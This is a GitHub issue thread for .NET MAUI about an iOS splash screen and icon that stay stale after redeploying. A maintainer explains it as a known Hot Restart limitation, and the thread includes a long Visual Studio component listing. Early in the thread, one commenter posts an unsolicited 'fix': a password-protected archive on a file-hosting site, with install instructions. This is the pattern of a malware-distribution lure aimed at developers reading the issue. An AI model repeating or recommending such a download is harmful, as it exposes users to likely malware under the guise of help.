### ISSUE TITLE
Bug Has Returned - MAUI iOS Splash Screen Not Updated After First Install

### ISSUE THREAD

**Issue by AuriR** [dotnet/maui#24562]
### Description

The issue mentioned in the following bug is back:

https://github.com/dotnet/maui/issues/8685

Same effective repro steps. Android works. iOS does not. Using .NET 8 release.

### Steps to Reproduce

See original issue. This bug appears to have returned.

### Version with bug

8.0.82 SR8.2

### Is this a regression from previous behavior?

Yes, this used to work in .NET MAUI

### Last version that worked well

Unknown/Other

### Affected platforms

iOS

### Affected platform versions

iOS 17.6.1

### Did you find any workaround?

No, and the workaround mentioned in the original doesn't appear to work. I tried renaming the file and the app just instantly crashes, even though the .csproj was updated properly.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jfversluis** [comment]
Are you deploying to your physical iOS device directly from Windows? With no Mac involved?
You mention the bug is now back, is this something that has affected you personally before, or do you think that because you found the other reports?

**Comment by AuriR** [comment]
> Are you deploying to your physical iOS device directly from Windows? With no Mac involved? Does it show the .NET splash screen or just a black screen?
> 
> You mention the bug is now back, is this something that has affected you personally before, or do you think that because you found the other reports?

I'll share a video today.

It doesn't matter how I deploy. The icon and splash screen that show are the first that were used when deployed. So, if I update and deploy to a different device/simulator, the new icon/splash appears. If I update and deploy to the same device, regardless of connected locally or remote via Pair to Mac, the icon/splash stay the same.

I did try the workaround of renaming the splash screen. Doing so insta-crashes the deployed app. I haven't grabbed the logs yet, but it only appears to confirm an issue exists.

**Comment by AuriR** [comment]
Visual Studio details:
![image](https://github.com/user-attachments/assets/c69e2eed-1c31-4a1b-859b-93db365d8855)
v17.11.2

**Comment by AuriR** [comment]
On another note, you might want to update the Copyright statement for VS to 2024?

**Comment by AuriR** [comment]
Dump of VS Details:

Microsoft Visual Studio Enterprise 2022
Version 17.11.2
VisualStudio.17.Release/17.11.2+35222.181
Microsoft .NET Framework
Version 4.8.09032

Installed Version: Enterprise

Architecture Diagrams and Analysis Tools   00476-80000-00000-AA436
Microsoft Architecture Diagrams and Analysis Tools

Visual C++ 2022   00476-80000-00000-AA436
Microsoft Visual C++ 2022

ADL Tools Service Provider   1.0
This package contains services used by Data Lake tools

ASA Service Provider   1.0

ASP.NET and Web Tools   17.11.230.51983
ASP.NET and Web Tools

Azure App Service Tools v3.0.0   17.11.230.51983
Azure App Service Tools v3.0.0

Azure Data Lake Tools for Visual Studio   2.6.5000.0
Microsoft Azure Data Lake Tools for Visual Studio

Azure Functions and Web Jobs Tools   17.11.230.51983
Azure Functions and Web Jobs Tools

Azure Stream Analytics Tools for Visual Studio   2.6.5000.0
Microsoft Azure Stream Analytics Tools for Visual Studio

C# Tools   4.11.0-3.24376.4+5e3a11e2e7f952da93f9d35bd63a2fa181c0608b
C# components used in the IDE. Depending on your project type and settings, a different version of the compiler may be used.

Common Azure Tools   1.10
Provides common services for use by Azure Mobile Services and Microsoft Azure Tools.

Cookiecutter   17.0.24138.2
Provides tools for finding, instantiating and customizing templates in cookiecutter format.

Entity Framework Core Power Tools   2.6
Adds useful design-time EF Core DbContext features to the Visual Studio Solution Explorer context menu.

Extensibility Message Bus   1.4.39 (main@e8108eb)
Provides common messaging-based MEF services for loosely coupled Visual Studio extension components communication and integration.

GitHub Copilot   0.2.1634.3922
GitHub Copilot is an AI pair programmer that helps you write code faster and with less work.

Microsoft Azure Hive Query Language Service   2.6.5000.0
Language service for Hive query

Microsoft Azure Stream Analytics Language Service   2.6.5000.0
Language service for Azure Stream Analytics

Microsoft Azure Tools for Visual Studio   2.9
Support for Azure Cloud Services projects

Microsoft JVM Debugger   1.0
Provides support for connecting the Visual Studio debugger to JDWP compatible Java Virtual Machines

Mono Debugging for Visual Studio   17.11.3 (ba13144)
Support for debugging Mono processes with Visual Studio.

Node.js Tools   1.5.60329.1 Commit Hash:15fce86a17f9f33e5bd7ca7ccb9b216aff149252
Adds support for developing and debugging Node.js apps in Visual Studio

NuGet Package Manager   6.11.0
NuGet Package Manager in Visual Studio. For more information about NuGet, visit https://docs.nuget.org/

Office Developer Tools for Visual Studio   17.10.35004.02
Microsoft Office Developer Tools for Visual Studio

Python - Profiling support   17.0.24138.2
Profiling support for Python projects.

Python with Pylance   17.0.24138.2
Provides IntelliSense, projects, templates, debugging, interactive windows, and other support for Python developers.

Razor (ASP.NET Core)   17.11.3.2442001+68650a7d94261bc56a1f4bc522c2ee35314b1abb
Provides languages services for ASP.NET Core Razor.

SQL Server Data Tools   17.11.38.0
Microsoft SQL Server Data Tools

ToolWindowHostedEditor   1.0
Hosting json editor into a tool window

TypeScript Tools   17.0.30715.2002
TypeScript Tools for Microsoft Visual Studio

Visual Basic Tools   4.11.0-3.24376.4+5e3a11e2e7f952da93f9d35bd63a2fa181c0608b
Visual Basic components used in the IDE. Depending on your project type and settings, a different version of the compiler may be used.

Visual F# Tools   17.11.0-beta.24317.3+c07c8ebad62f6629b36349381991a299598a8d74
Microsoft Visual F# Tools

Visual Studio IntelliCode   2.2
AI-assisted development for Visual Studio.

VisualStudio.DeviceLog   1.0
Information about my package

VisualStudio.Mac   1.0
Mac Extension for Visual Studio

VSPackage Extension   1.0
VSPackage Visual Studio Extension Detailed Info

Workflow Manager Tools 1.0   1.0
This package contains the necessary Visual Studio integration components for Workflow Manager.

Xamarin   17.11.0.94 (d17-11@e83323e)
Visual Studio extension to enable development for Xamarin.iOS and Xamarin.Android.

Xamarin Designer   17.11.3.11 (remotes/origin/d17-11@cdbb0a4fdd)
Visual Studio extension to enable Xamarin Designer tools in Visual Studio.

Xamarin Templates   17.9.0 (38e87ba)
Templates for building iOS, Android, and Windows apps with Xamarin and Xamarin.Forms.

Xamarin.Android SDK   13.2.2.0 (d17-5/45b0e14)
Xamarin.Android Reference Assemblies and MSBuild support.
    Mono: d9a6e87
    Java.Interop: xamarin/java.interop/d17-5@149d70fe
    SQLite: xamarin/sqlite/3.40.1@68c69d8
    Xamarin.Android Tools: xamarin/xamarin-android-tools/d17-5@ca1552d


Xamarin.iOS and Xamarin.Mac SDK   16.4.0.23 (9defd91b3)
Xamarin.iOS and Xamarin.Mac Reference Assemblies and MSBuild support.

ZenCoding   1.2.20
Provides ZenCoding for the HTML Editor - full support for static HTML, Razor and WebForms.

**Comment by Zhanglirong-Winnie** [comment]
This issue has been verified using Visual Studio 17.11.2 (8.0.80 & 8.0.82 ). Can repro on iOS local device platform.

**Comment by jfversluis** [comment]
> OK here's a video of the issue. Note that if I deploy locally, the old icon comes back. If I connect to the Mac via Pair to Mac the new icon appears. If I connect a new device, the new icon appears. I did not record the latter, but the video should make what's happening clear.

This is the explanation right here.

If you deploy directly from Windows to your iDevice, you're using Hot Restart. If you look at [the documentation](https://learn.microsoft.com/dotnet/maui/ios/hot-restart) and look under Limitations, you will find

> Asset catalogs aren't supported. When using Hot Restart, your app will show a .NET icon and launch screen.

So this is expected and a known limitation. Closing this one as there is not much we can do here at this time.
This is not an issue when you deploy to the store, only for you locally when you deploy from Windows directly to your iPad.

Thank you so much for the video which made it all very clear!
